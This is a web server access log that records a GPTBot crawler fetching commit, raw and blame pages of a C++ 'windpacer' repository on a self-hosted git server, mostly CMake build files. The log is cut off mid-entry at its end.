GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" +[17/Feb/2026:15:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" +[17/Feb/2026:15:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" +[17/Feb/2026:15:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" +[17/Feb/2026:15:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" +[17/Feb/2026:15:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11067] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11066] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11069] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10007] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10005] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10004] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14726] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14727] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14726] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11307] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11306] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10251] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10232] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21356] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10663] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31152] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31149] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10664] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] 